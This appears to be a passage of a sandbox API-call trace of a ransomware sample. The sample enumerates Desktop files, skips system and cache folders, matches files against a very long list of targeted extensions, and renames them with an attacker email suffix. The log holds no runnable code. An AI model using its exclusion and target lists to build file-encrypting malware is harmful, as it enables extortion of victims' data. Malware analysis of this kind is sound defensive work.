	[0182.792] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="cache") returned 0x0
	[0182.792] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.793] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="temporary internet files") returned 0x0
	[0182.793] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.793] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="webcache") returned 0x0
	[0182.793] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.793] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="inetcache") returned 0x0
	[0182.793] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.793] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="nvidia") returned 0x0
	[0182.793] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.794] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="packages") returned 0x0
	[0182.794] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.794] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="cookies") returned 0x0
	[0182.794] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.794] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\*.*", lpSrch="programdata") returned 0x0
	[0182.794] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0182.794] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0182.794] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8678bf2c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8678bf2c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0182.795] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0182.795] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85a48cdc, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85a48cdc, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85a48cdc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x17520, dwReserved0=0x0, dwReserved1=0x0, cFileName="-_zt.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="-_ZTSW~1.SCL")) returned 1
	[0182.795] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85a95431, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85a95431, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85a95431, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x9a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1it-vw cosug.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="1IT-VW~1.SCL")) returned 1
	[0182.795] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72d6080, ftCreationTime.dwHighDateTime=0x1d97af9, ftLastAccessTime.dwLowDateTime=0x72d6080, ftLastAccessTime.dwHighDateTime=0x1d97af9, ftLastWriteTime.dwLowDateTime=0x5639d00, ftLastWriteTime.dwHighDateTime=0x1d97af9, nFileSizeHigh=0x0, nFileSizeLow=0x21600, dwReserved0=0x0, dwReserved1=0x0, cFileName="3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe", cAlternateFileName="3729C1~1.EXE")) returned 1
	[0182.795] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85ae1687, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85ae1687, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85ae1687, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x159c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="7umfwwk.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="7UMFWW~1.SCL")) returned 1
	[0182.795] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85b2e18f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85b2e18f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85b2e18f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xca0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ayy4qge5axllktej45b.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="AYY4QG~1.SCL")) returned 1
	[0182.795] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd285ee50, ftCreationTime.dwHighDateTime=0x1d97379, ftLastAccessTime.dwLowDateTime=0x444d6b50, ftLastAccessTime.dwHighDateTime=0x1d97661, ftLastWriteTime.dwLowDateTime=0x444d6b50, ftLastWriteTime.dwHighDateTime=0x1d97661, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BeYl_s9Ay -D", cAlternateFileName="BEYL_S~1")) returned 1
	[0182.795] lstrcmpW (lpString1="BeYl_s9Ay -D", lpString2="..") returned 1
	[0182.795] lstrcmpW (lpString1="BeYl_s9Ay -D", lpString2=".") returned 1
	[0182.795] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop"
	[0182.795] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0182.795] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="BeYl_s9Ay -D" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D"
	[0182.795] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D"
	[0182.796] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\"
	[0182.796] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\"
	[0182.796] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\*.*"
	[0182.796] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd285ee50, ftCreationTime.dwHighDateTime=0x1d97379, ftLastAccessTime.dwLowDateTime=0x444d6b50, ftLastAccessTime.dwHighDateTime=0x1d97661, ftLastWriteTime.dwLowDateTime=0x444d6b50, ftLastWriteTime.dwHighDateTime=0x1d97661, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0182.796] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\*.*") returned 46
	[0182.796] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.796] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\*.*", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*") returned 0x2e
	[0182.796] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.797] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="windows") returned 0x0
	[0182.797] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.797] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="boot") returned 0x0
	[0182.797] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.797] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="system volume information") returned 0x0
	[0182.804] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.805] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0182.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.805] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="temp") returned 0x0
	[0182.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.805] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="program files") returned 0x0
	[0182.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.805] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="program files (x86)") returned 0x0
	[0182.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.806] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="appdata") returned 0x0
	[0182.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.806] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="application data") returned 0x0
	[0182.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.806] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="winnt") returned 0x0
	[0182.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.806] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="tmp") returned 0x0
	[0182.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.807] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="cache") returned 0x0
	[0182.807] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.807] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="temporary internet files") returned 0x0
	[0182.807] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.807] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="webcache") returned 0x0
	[0182.807] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.807] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="inetcache") returned 0x0
	[0182.807] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.808] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="nvidia") returned 0x0
	[0182.808] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.808] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="packages") returned 0x0
	[0182.808] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.808] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="cookies") returned 0x0
	[0182.808] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.809] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\*.*", lpSrch="programdata") returned 0x0
	[0182.809] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd285ee50, ftCreationTime.dwHighDateTime=0x1d97379, ftLastAccessTime.dwLowDateTime=0x444d6b50, ftLastAccessTime.dwHighDateTime=0x1d97661, ftLastWriteTime.dwLowDateTime=0x444d6b50, ftLastWriteTime.dwHighDateTime=0x1d97661, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0182.809] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf6a87b0, ftCreationTime.dwHighDateTime=0x1d96e4e, ftLastAccessTime.dwLowDateTime=0x1b41dc30, ftLastAccessTime.dwHighDateTime=0x1d9703c, ftLastWriteTime.dwLowDateTime=0x1b41dc30, ftLastWriteTime.dwHighDateTime=0x1d9703c, nFileSizeHigh=0x0, nFileSizeLow=0x16146, dwReserved0=0x0, dwReserved1=0x0, cFileName="22_UiR_zgNsOdS5-Vj.wav", cAlternateFileName="22_UIR~1.WAV")) returned 1
	[0182.809] lstrcmpW (lpString1="22_UiR_zgNsOdS5-Vj.wav", lpString2="..") returned 1
	[0182.809] lstrcmpW (lpString1="22_UiR_zgNsOdS5-Vj.wav", lpString2=".") returned 1
	[0182.809] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\"
	[0182.809] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\", lpString2="22_UiR_zgNsOdS5-Vj.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\22_UiR_zgNsOdS5-Vj.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\22_UiR_zgNsOdS5-Vj.wav"
	[0182.809] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\22_UiR_zgNsOdS5-Vj.wav") returned 65
	[0182.810] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.810] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\22_UiR_zgNsOdS5-Vj.wav", cchLength=0x41 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\22_uir_zgnsods5-vj.wav") returned 0x41
	[0182.810] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.810] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\22_uir_zgnsods5-vj.wav", lpSrch="help_decrypt_your_files") returned 0x0
	[0182.810] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\22_uir_zgnsods5-vj.wav" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\22_uir_zgnsods5-vj.wav") returned="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\22_uir_zgnsods5-vj.wav"
	[0182.810] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\22_uir_zgnsods5-vj.wav") returned 65
	[0182.810] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.811] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.811] StrStrW (lpFirst=".wav", lpSrch=".") returned=".wav"
	[0182.811] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.811] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".wav") returned=".wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.